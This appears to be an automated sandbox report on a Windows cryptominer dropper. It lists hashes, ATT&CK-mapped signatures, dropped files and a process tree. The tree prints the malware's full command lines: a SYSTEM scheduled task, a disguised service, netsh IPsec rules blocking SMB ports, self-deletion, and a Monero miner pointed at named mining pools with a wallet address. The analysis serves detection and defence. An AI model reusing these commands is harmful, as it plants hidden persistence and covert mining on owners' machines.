6edb794a9f28cbd60dcb9fefc0e145f64c9e623b3df235a4a907ca948fd1edb9

General

Target

618a1e3551560b86454450f3ea580029.exe
Size

584KB
MD5

618a1e3551560b86454450f3ea580029
SHA1

39d86228750d1eebdb78f60b03c3b638acf72d34
SHA256

6edb794a9f28cbd60dcb9fefc0e145f64c9e623b3df235a4a907ca948fd1edb9
SHA512

d5b309a0ff9b07e74c9cee1df37a627193393de7cc0fe079ab606d94b2beac948c8d7d25378de3cf87b00c7227c70fa8e49291d6060a7254e2ce0439a09c2305

Score

10^/10

persistence evasion miner

Malware Config

Signatures

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1556 schtasks.exe

pid	process
1556	schtasks.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

System Information Discovery

T1082

Processes:

66545a.exetqnkhe.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Wine	66545a.exe
Key opened	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Wine	tqnkhe.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

618a1e3551560b86454450f3ea580029.exe66545a.exetqnkhe.exe

pid process

1520 618a1e3551560b86454450f3ea580029.exe
1520 618a1e3551560b86454450f3ea580029.exe
664 66545a.exe
664 66545a.exe
1564 tqnkhe.exe
1564 tqnkhe.exe
Loads dropped DLL 6 IoCs

Processes:

618a1e3551560b86454450f3ea580029.exe66545a.exetqnkhe.exe

pid process

1520 618a1e3551560b86454450f3ea580029.exe
1520 618a1e3551560b86454450f3ea580029.exe
664 66545a.exe
664 66545a.exe
1564 tqnkhe.exe
1808
Executes dropped EXE 3 IoCs

Processes:

66545a.exetqnkhe.exeJs.exe

pid process

664 66545a.exe
1564 tqnkhe.exe
1116 Js.exe
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

528 cmd.exe
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

66545a.exetqnkhe.exe

pid process

664 66545a.exe
1564 tqnkhe.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

Js.exe

description pid process

Token: SeLockMemoryPrivilege 1116 Js.exe
Token: SeLockMemoryPrivilege 1116 Js.exe

pid	process
664	66545a.exe
1564	tqnkhe.exe
1116	Js.exe

pid	process
528	cmd.exe

pid	process
664	66545a.exe
1564	tqnkhe.exe

description	pid	process
Token: SeLockMemoryPrivilege	1116	Js.exe
Token: SeLockMemoryPrivilege	1116	Js.exe

Modifies WinLogon for persistence 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

66545a.exetqnkhe.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe "	66545a.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe C:\\Windows\\cZDUg\\tqnkhe.exe"	tqnkhe.exe

Creates new service(s) 1 TTPs
persistence

New Service
T1050

Modifies service 2 TTPs 152 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\IPSec\OperationMode = "3"	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups	netsh.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig	netsh.exe

Suspicious use of WriteProcessMemory 168 IoCs

Processes:

618a1e3551560b86454450f3ea580029.exe66545a.exetqnkhe.execmd.exe

description	pid	process	target process
PID 1520 wrote to memory of 664	1520	618a1e3551560b86454450f3ea580029.exe	66545a.exe
PID 1520 wrote to memory of 664	1520	618a1e3551560b86454450f3ea580029.exe	66545a.exe
PID 1520 wrote to memory of 664	1520	618a1e3551560b86454450f3ea580029.exe	66545a.exe
PID 1520 wrote to memory of 664	1520	618a1e3551560b86454450f3ea580029.exe	66545a.exe
PID 1520 wrote to memory of 528	1520	618a1e3551560b86454450f3ea580029.exe	cmd.exe
PID 1520 wrote to memory of 528	1520	618a1e3551560b86454450f3ea580029.exe	cmd.exe
PID 1520 wrote to memory of 528	1520	618a1e3551560b86454450f3ea580029.exe	cmd.exe
PID 1520 wrote to memory of 528	1520	618a1e3551560b86454450f3ea580029.exe	cmd.exe
PID 664 wrote to memory of 1564	664	66545a.exe	tqnkhe.exe
PID 664 wrote to memory of 1564	664	66545a.exe	tqnkhe.exe
PID 664 wrote to memory of 1564	664	66545a.exe	tqnkhe.exe
PID 664 wrote to memory of 1564	664	66545a.exe	tqnkhe.exe
PID 664 wrote to memory of 1916	664	66545a.exe	cmd.exe
PID 664 wrote to memory of 1916	664	66545a.exe	cmd.exe
PID 664 wrote to memory of 1916	664	66545a.exe	cmd.exe
PID 664 wrote to memory of 1916	664	66545a.exe	cmd.exe
PID 1564 wrote to memory of 1504	1564	tqnkhe.exe	cmd.exe
PID 1564 wrote to memory of 1504	1564	tqnkhe.exe	cmd.exe
PID 1564 wrote to memory of 1504	1564	tqnkhe.exe	cmd.exe
PID 1564 wrote to memory of 1504	1564	tqnkhe.exe	cmd.exe
PID 1504 wrote to memory of 924	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 924	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 924	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 924	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1840	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1840	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1840	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1840	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1752	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1752	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1752	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1752	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1804	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1804	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1804	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1804	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1520	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1520	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1520	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1520	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 832	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 832	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 832	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 832	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1960	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1960	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1960	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1960	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 300	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 300	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 300	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 300	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1588	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1588	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1588	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 1588	1504	cmd.exe	netsh.exe
PID 1564 wrote to memory of 692	1564	tqnkhe.exe	cmd.exe
PID 1564 wrote to memory of 692	1564	tqnkhe.exe	cmd.exe
PID 1564 wrote to memory of 692	1564	tqnkhe.exe	cmd.exe
PID 1564 wrote to memory of 692	1564	tqnkhe.exe	cmd.exe
PID 1504 wrote to memory of 984	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 984	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 984	1504	cmd.exe	netsh.exe
PID 1504 wrote to memory of 984	1504	cmd.exe	netsh.exe

Suspicious behavior: EnumeratesProcesses 47 IoCs

Processes:

618a1e3551560b86454450f3ea580029.exe66545a.exetqnkhe.exe

pid	process
1520	618a1e3551560b86454450f3ea580029.exe
1520	618a1e3551560b86454450f3ea580029.exe
1520	618a1e3551560b86454450f3ea580029.exe
1520	618a1e3551560b86454450f3ea580029.exe
664	66545a.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe
1564	tqnkhe.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

66545a.exetqnkhe.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 66545a.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ tqnkhe.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	66545a.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	tqnkhe.exe

Drops file in Windows directory 66 IoCs

Processes:

tqnkhe.exe66545a.exe

description	ioc	process
File created	C:\Windows\cZDUg\tibe-1.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\tqnkhe.exe	66545a.exe
File created	C:\Windows\cZDUg\pcre-0.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\tucl.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\ip.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\exma.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\pcrecpp-0.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\pcreposix-0.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\cnli-1.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\etebCore-2.x86.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\posh-0.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\tibe-2.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\trch.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\trch-1.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\trfo-2.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\TFf	tqnkhe.exe
File created	C:\Windows\cZDUg\tscl.html	66545a.exe
File created	C:\Windows\cZDUg\etch-0.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\esco-0.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\zibe.dll	tqnkhe.exe
File created	C:\Windows\IME\tps.exe	66545a.exe
File created	C:\Windows\end.bat	tqnkhe.exe
File created	C:\Windows\cZDUg\coli-0.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\pcla-0.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\trch-0.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\xdvl-0.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\Cstr.xml	tqnkhe.exe
File created	C:\Windows\cZDUg\cnli-0.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\etchCore-0.x86.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\zlib1.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\chrome..fb	tqnkhe.exe
File created	C:\Windows\cZDUg\etchCore-0.x64.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\chrome..xml	tqnkhe.exe
File created	C:\Windows\cZDUg\tibe.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\svchost.exe	tqnkhe.exe
File opened for modification	C:\Windows\end.bat	tqnkhe.exe
File created	C:\Windows\cZDUg\qdx.bat	tqnkhe.exe
File created	C:\Windows\cZDUg\exma-1.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\libeay32.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\libxml2.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\ucl.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\Cstr.exe	tqnkhe.exe
File created	C:\Windows\cZDUg\adfw-2.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\etebCore-2.x64.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\WinRing0x64.sys	tqnkhe.exe
File created	C:\Windows\cZDUg\Js.exe	tqnkhe.exe
File created	C:\Windows\cZDUg\adfw.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\eteb-2.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\dmgd-1.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\dmgd-4.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\tucl-1.dll	tqnkhe.exe
File created	C:\Windows\boy.exe	66545a.exe
File created	C:\Windows\cZDUg\Cstr.fb	tqnkhe.exe
File created	C:\Windows\cZDUg\s.bat	tqnkhe.exe
File created	C:\Windows\cZDUg\trfo.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\trfo-0.dll	tqnkhe.exe
File opened for modification	C:\Windows\cZDUg\tscl.html	tqnkhe.exe
File created	C:\Windows\cZDUg\libiconv-2.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\riar.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\riar-2.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\chrome..exe	tqnkhe.exe
File created	C:\Windows\cZDUg\crli-0.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\iconv.dll	tqnkhe.exe
File created	C:\Windows\cZDUg\ssleay32.dll	tqnkhe.exe

C:\Users\Admin\AppData\Local\Temp\618a1e3551560b86454450f3ea580029.exe
"C:\Users\Admin\AppData\Local\Temp\618a1e3551560b86454450f3ea580029.exe"
1⤵
- Suspicious use of SetWindowsHookEx
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
PID:1520

C:\Users\Admin\AppData\Local\Temp\66545a.exe
"C:\Users\Admin\AppData\Local\Temp\66545a.exe"
2⤵
- Identifies Wine through registry keys
- Suspicious use of SetWindowsHookEx
- Loads dropped DLL
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies WinLogon for persistence
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Windows directory
PID:664

C:\Windows\cZDUg\tqnkhe.exe
C:\Windows\cZDUg\tqnkhe.exe
3⤵
- Identifies Wine through registry keys
- Suspicious use of SetWindowsHookEx
- Loads dropped DLL
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies WinLogon for persistence
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Windows directory
PID:1564

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\end.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:1504

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=ipsec_ply
5⤵
- Modifies service
PID:924

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=deny_pt
5⤵
- Modifies service
PID:1840

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=allow_pt
5⤵
- Modifies service
PID:1752

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
5⤵
- Modifies service
PID:1804

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
5⤵
- Modifies service
PID:1520

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
5⤵
- Modifies service
PID:832

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=allow action=negotiate
5⤵
- Modifies service
PID:1960

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
5⤵
- Modifies service
PID:300

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
5⤵
- Modifies service
PID:1588

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=ipsec_ply assign=y
5⤵
- Modifies service
PID:984

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\end.bat" "
4⤵
PID:692

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=ipsec_ply
5⤵
- Modifies service
PID:1352

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=deny_pt
5⤵
- Modifies service
PID:1832

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=allow_pt
5⤵
- Modifies service
PID:756

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
5⤵
- Modifies service
PID:1344

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
5⤵
- Modifies service
PID:1608

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
5⤵
- Modifies service
PID:1920

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=allow action=negotiate
5⤵
- Modifies service
PID:1876

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
5⤵
- Modifies service
PID:1796

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
5⤵
- Modifies service
PID:1224

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=ipsec_ply assign=y
5⤵
- Modifies service
PID:524

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\end.bat" "
4⤵
PID:1468

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=ipsec_ply
5⤵
- Modifies service
PID:1116

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=deny_pt
5⤵
- Modifies service
PID:1864

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=allow_pt
5⤵
PID:1224

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
5⤵
- Modifies service
PID:524

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
5⤵
- Modifies service
PID:300

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
5⤵
- Modifies service
PID:1376

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=allow action=negotiate
5⤵
- Modifies service
PID:1044

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
5⤵
- Modifies service
PID:1804

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
5⤵
- Modifies service
PID:1064

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=ipsec_ply assign=y
5⤵
- Modifies service
PID:1628

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\end.bat" "
4⤵
PID:1588

C:\Windows\SysWOW64\sc.exe
sc.exe Create "Application Layre Gateway Saervice" type= own type= interact start= demand DisplayName= "Can not be deledted" binPath= "cmd.exe /c start "C:\Windows\boy.exe"
4⤵
PID:1844

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\cZDUg\qdx.bat" "
4⤵
PID:1692

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /TN "\Microsoft\Windows\UPnP\Services" /RU SYSTEM /TR "C:\Windows\cZDUg\tqnkhe.exe" /SC ONSTART
5⤵
- Creates scheduled task(s)
PID:1556

C:\Windows\cZDUg\Js.exe
"C:\Windows\cZDUg\Js.exe" -o stratum+tcp://rx.monerorx.com:8888 -o stratum+tcp://rx1.monerorx.com:9855 -o ttt.ppxfghdfhdfhfghxmr.com:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=1
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1116

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\66545a.exe"
3⤵
PID:1916

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\618a1e3551560b86454450f3ea580029.exe"
2⤵
- Deletes itself
PID:528

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Winlogon Helper DLL

1

T1004

New Service

1

T1050

Modify Existing Service

1

T1031

